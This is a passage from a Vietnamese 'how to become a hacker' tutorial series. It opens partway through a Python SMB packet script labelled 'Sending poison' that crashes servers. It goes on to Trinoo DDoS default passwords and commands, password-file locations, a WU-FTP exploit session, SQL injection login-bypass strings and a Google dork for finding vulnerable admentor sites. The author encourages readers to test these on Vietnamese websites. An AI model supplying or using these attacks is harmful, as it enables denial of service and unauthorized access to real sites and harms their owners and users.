07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00 
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72 
76 73 76 63 00 
``````, 
# yêu cầu biên dịch SMB 
`````` 
ff 53 4d 42 25 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00 
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49 
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00 
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c 
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 
``````, 
# SMBtrans Request 
`````` 
ff 53 4d 42 25 00 
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00 
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00 
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00 
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00 
00 00 00 00 00 00 ff ff ff ff 00 00 00 00 
`````` 

crud = map(a2b, crud) 
def smb_send(sock, data, type=0, flags=0): 
d = struct.pack(`!BBH`, type, flags, len(data)) 
#print `send:`, b2a(d+data) 
sock.send(d+data) 
def smb_recv(sock): 
s = sock.recv(4) 
assert(len(s) == 4) 
type, flags, length = struct.unpack(`!BBH`, s) 
data = sock.recv(length) 
assert(len(data) == length) 
#print `recv:`, b2a(s+data) 
return type, flags, data 
def nbss_send(sock, data): 
sock.send(data) 
def nbss_recv(sock): 
s = sock.recv(4) 
assert(len(s) == 4) 
return s 
def main(host, port=139): 
s = socket(AF_INET, SOCK_STREAM) 
s.connect(host, port) 
nbss_send(s, nbss_session) 
nbss_recv(s) 
for msg in crud[:-1]: 
smb_send(s, msg) 
smb_recv(s) 
smb_send(s, crud[-1]) # no response to this 
s.close() 
if __name__ == `__main__`: 
print `Sending poison...`, 
main(sys.argv[1]) 
print `done.` 


Để có thể làm down được server của đối phương bạn cần phải có thời gian DoS , nếu không có điều kiện chờ đợi tốt nhất bạn không nên sử dụng cách này . Nhưng “vọc” thử cho biết thì được đúng không ? 

41 . ) Tấn công DDoS thông qua Trinoo : 

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu. Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định . 
_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----- > Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống . 

attacker$ telnet 10.0.0.1 27665 
Trying 10.0.0.1 
Connected to 10.0.0.1 
Escape character is `^]`. 
kwijibo 
Connection closed by foreign host. < == Bạn đã nhập sai 


attacker$ telnet 10.0.0.1 27665 
Trying 10.0.0.1 
Connected to 10.0.0.1 
Escape character is `^]`. 
betaalmostdone 
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] 
trinoo > < == bạn đã vào được hệ thống trinoo 

_ Đây là vài passwd mặc định : 

“l44adsl``: pass của trinoo daemon . 
``gorave``: passwd của trinoo master server khi startup . 
``betaalmostdone``: passwd điều khiển từ xa chung cho trinoo master . 
``killme``: passwd trinoo master điều khiển lệnh ``mdie`` . 

_ Đây là một số lệnh dùng để điều khiển Master Server: 


CODE 
die------------------------------------------------ ------------Shutdown. 
quit----------------------------------------------- -------------Log off. 
mtimer N-------------------------------------------------- --Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1-- > 1999 giây . 
dos IP------------------------------------------------- ------Tấn công đến một địa chỉ IP xác định . 
mdie pass----------------------------------------------- ----Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới (``d1e l44adsl``) Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này 
mping---------------------------------------------- ----------Gửi một lệnh ping tới (``png l44adsl``) c¸c Broadcast. 
mdos ------------------------------------------Send nhiều lênh DOS (``xyz l44adsl 123:ip1:ip2``) đến các Broadcast.
info----------------------------------------------- --------------Hiển thị thông tin về Trinoo .
msize---------------------------------------------- ------------Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS.
nslookup host----------------------------------------------X ác định tên thiết bị của Host mà Master Trinoo đang chạy .
usebackup------------------------------------------ ---------Chuyển tớI các file Broadcast sao lưu được tạo bởi lệnh “killdead”.
bcast---------------------------------------------- -------------Liệt kê danh sách tất cả các Broadcast có thể khai thác .
help [cmd] --------------------------------------------------- Đưa ra danh sách các lệnh .
mstop---------------------------------------------- -------------Ngừng lại các cuốc tấn công DOS .


_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE
aaa pass IP------------------------------------------------- ---Tấn công đến địa chỉ IP đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1-- > 1999 s .
bbb pass N-------------------------------------------------- ---Đặt thờI gian giới hạn cho các cuộc tấn công DOS .
Shi pass----------------------------------------------- ---------Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP.
png pass----------------------------------------------- --------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass----------------------------------------------- ---------Shutdown Trinoo.
rsz N-------------------------------------------------- ----------Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte .
xyz pass 123:ip1:ip3---------------------------------------- tấn công DOS nhiều mục tiêu cùng lúc .


( Dựa theo hướng dẫn của huynh Binhnx2000 )
Còn nhiều đoạn mã và cách ứng dụng để DoS lắm , các bạn chịu khó tìm hiểu thêm nhé . Nhưng đừng tấn công lung tung , nhất là server của HVA , coi chừng không thu được hiệu quả mà còn bị lock nick nữa đó 


Theo quantrimang.com

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 5

31 . ) Gói tin TCP/IP là gì?
TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người khác!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này.


32 . ) Linux là gi`:

_Nói theo nghĩa gốc, Linux là nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm trách chức vụ liên lạc giữa các chương trình ứng dụng máy tính và phần cứng. Cung cấp các chứng năng như: quản lý file, quản lý bộ nhớ ảo, các thiết bị nhập xuất nhưng ổ cứng, màn hình, bàn phím, .... Nhưng Nhân Linux chưa phải là 1 HĐH, vì thế nên Nhân Linux cần phải liên kết với những chương trình ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH hoàn chỉnh: HĐH Linux. Đây cũng là lý do tại sao chúng ta thấy GNU/Linux khi được nhắc đến Linux.
Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các sản phẩm này ( Nhân và Chương trình ứng dụng ) sau đó sửa chữa một số cấu hình để mang đặc trưng của công ty/ tổ chức mình và làm thêm phần cài đặt ( Installation Process ) cho bộ Linux đó, chúng ta có : Distribution. Các Distribution khác nhau ở số lượng và loại Software được đóng gói cũng như quá trình cài đặt, và các phiên bản của Nhân. 1 số Distribution lớn hiện nay của Linux là : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Các lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống Linux :

_ Lệnh `` man`` : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh `` uname ``: cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .
Ví du : $ cd /usr/bin ---- > nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ : $ mkdir /home/convit --- > nó sẽ tạo 1 thư mục convit trong /home
_ Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga ---- > nó sẽ gỡ bỏ thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ : $ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .
Ví dụ : $printf %s ``\x41\x41\x41\x41``
_ Lệnh pwd: đưa ra thư mục hiện hành
Ví dụ : $pwd ------ > nó sẽ cho ta biết vị trí hiện thời của ta ở đâu : /home/level1
_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----- > nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : tìm kiếm file, thư mục
Ví dụ : $find / -user level2
_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep ``something``
Vidu : $ps axuw | grep ``level1``
_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm thấy cả password nữa
VD: $strings /usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace .
Ví dụ : $strace /usr/bin/level1
_ Lệnh`` cat, more ``: in nội dung file ra màn hình

$cat /etc/passwd | more -- > nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd ---- > Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một ngôn ngữ
Ví dụ : $perl -e `print ``A``x1024` | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh vào 1024 kí tự )
_ Lệnh ``bash`` : đã đến lúc tự động hoá các tác vụ của bạn bằng shell script, cực mạnh và linh hoạt .
Bạn muốn tìm hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home ---- > sẽ hiện toàn bộ file trong thư mục Home
$ ls -a ----- > hiện toàn bộ file , bao gồm cả file ẩn
$ ls -l ----- > đưa ra thông tin về các file
_ Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi ------ > ghi dữ liệu hiển thị thông tin của thư mục bin vào 1 file convoi .

34 . ) Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống có tên là convit thì sẽ có 1 thư mục là /home/convit )
_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .
_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_ /usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *


35 . ) Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server : 
_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần mềm Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux ( tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake....) và cả Windows.... , các hacker có thể thực thi các câu lệnh của mình từ xa thông qua file globbing bằng cách ghi đè lên file có trên hệ thống .
_ Tuy nhiên , việc khai thác lỗi này không phảI là dễ vì nó phải hội đủ những điều kiện sau :
+ Phải có account trên server .
+ Phải đặt được Shellcode vào trong bộ nhớ Process của Server .
+ Phải gửi một lệnh FTP đặc biệt chứa đựng một globbing mẫu đặc biệt mà không bị server phát hiện có lỗi .
+ Hacker sẽ ghi đè lên một Function, Code tới một Shellcode, có thể nó sẽ được thực thi bới chính Server FTP .
_ Ta hãy phân tích VD sau về việc ghi đè lên file của server FTP :

CODE
ftp > open localhost <== lệnh mở trang bị lỗi .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== xâm nhập thành công FTP server .
Name (localhost:root): anonymous <== Nhập tên chỗ này
331 Guest login ok, send your complete e-mail address as password.
Password:………..<== nhập mật khẩu ở đây
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== sử dụng biến nhị phân để chuyển đổi file .
ftp > ls ~{ <== lệnh liệt kê thư mục hiện hành .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 ç chấp nhận kết nốI ở cổng 21 .
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c


Việc khai thác qua lỗi này đến nay tôi test vẫn chưa thành công ( chẳng biết làm sai chỗ nào ) . Vậy bạn nào làm được hãy post lên cho anh em biết nhé .
Lỗi Linux hiện nay rất ít ( đặc biệt là đối với Redhat ), các bạn hãy chờ đợi nếu có lỗi gì mới thì bên “LỗI bảo mật” sẽ cập nhật ngay . Khai thác chúng như thế nào thì hỏi Mod quản lý bên đó , đặc biệt là bạn Leonhart , cậu ta siêng trả lời các bạn lắm .

( Dựa theo bài viết của huynh Binhnx2000 )

36 . ) Tìm hiểu về SQL Injection :

_ SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, thi hành lệnh từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, ...
_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng các công cụ tìm kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang Web chuyển tham số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD ta xác định được trang này sử dụng Submit dữ liệu nhờ nhìn vào mã mà ta đã viewsource :

CODE
<input type=hidden name=A value=C >

_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng cách nhập vào login và pass lân lượt như sau :

- Login: hi` or 1=1--
- Pass: hi` or 1=1--

Nếu không được bạn thử tiếp với các login và pass sau :

CODE
` or 1=1--
`` or 1=1--
or 1=1--
` or `a`=`a
`` or ``a``=``a
`) or (`a`=`a

Nếu thành công, bạn có thể login vào mà không cần phải biết username và password .
Lỗi này có dính dáng đến Query nên nếu bạn nào đã từng học qua cơ sở dữ liệu có thể khai thác dễ dàng chỉ bằng cách đánh các lệnh Query trên trình duyệt của các bạn . Nếu các bạn muốn tìm hiểu kỹ càng hơn về lỗi này có thể tìm các bài viết của nhóm vicky để tìm hiểu thêm .

37 . ) Một VD về hack Web thông qua lỗi admentor ( Một dạng của lỗi SQL Injection ) :

_ Trước tiên bạn vào google.com tìm trang Web admentor bằng từ khoá “allinurl : admentor” .
_ Thông thường bạn sẽ có kết quả sau :

http://www.someserver.com/admentor /admin/admin.asp

_ Bạn thử nhập “ ` or ``=` ” vào login và password :

CODE
Login : ` or ``=`
Password : ` or ``=`


_ Nếu thành công bạn sẽ xâm nhập vào Web bị lỗi với vai trò là admin .
_ Ta hãy tìm hiểu về cách fix lỗi này nhé :
+ Lọc các ký tự đặc biệt như “ ` `` ~ \ ” bằng cách chêm vào javascrip đoạn mã sau :

CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/\<|\ > |\``|\`|\%|\;|\(|\)|\&|\+|
\-/g,````);
return strTemp;
}

+ Và gọi nó từ bên trong của asp script :

CODE
var login = var TempStr = RemoveBad
(Request.QueryString(``login``));
var password = var TempStr = RemoveBad
(Request.QueryString(``password``));


- Vậy là ta đã fix xong lỗi . 
- Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ liệu , các bạn hãy test thử xem đi , các trang Web ở Việt Nam mình bị nhiều lắm , tôi đã kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đã báo để họ fix lại ) .
-  Có nhiều trang khi login không phải bằng “ ` or ``=’ ” mà bằng các nick name có thật đã đăng ký trên trang Web đó , ta vào link “thành viên” kiếm nick của một admin để test thử nhé .
Hack vui vẻ .


Ở phần 6 tôi sẽ đề cập đến kiểu tấn công từ chối dịch vụ ( DoS attack ) , một kiểu tấn công lợi hại đã làm cho trang Web hùng mạnh như HVA của chúng ta bị tắt nghẽn chỉ trong thờI gian ngắn các admin bận đi uống cafe hết mà không ai trông coi . Kèm theo đó là các phương pháp tấn công DoS đã và đang được sử dụng . 

GOOKLUCK!!!!!!!!!!!!!!!!!!!! 
Theo quantrimang.com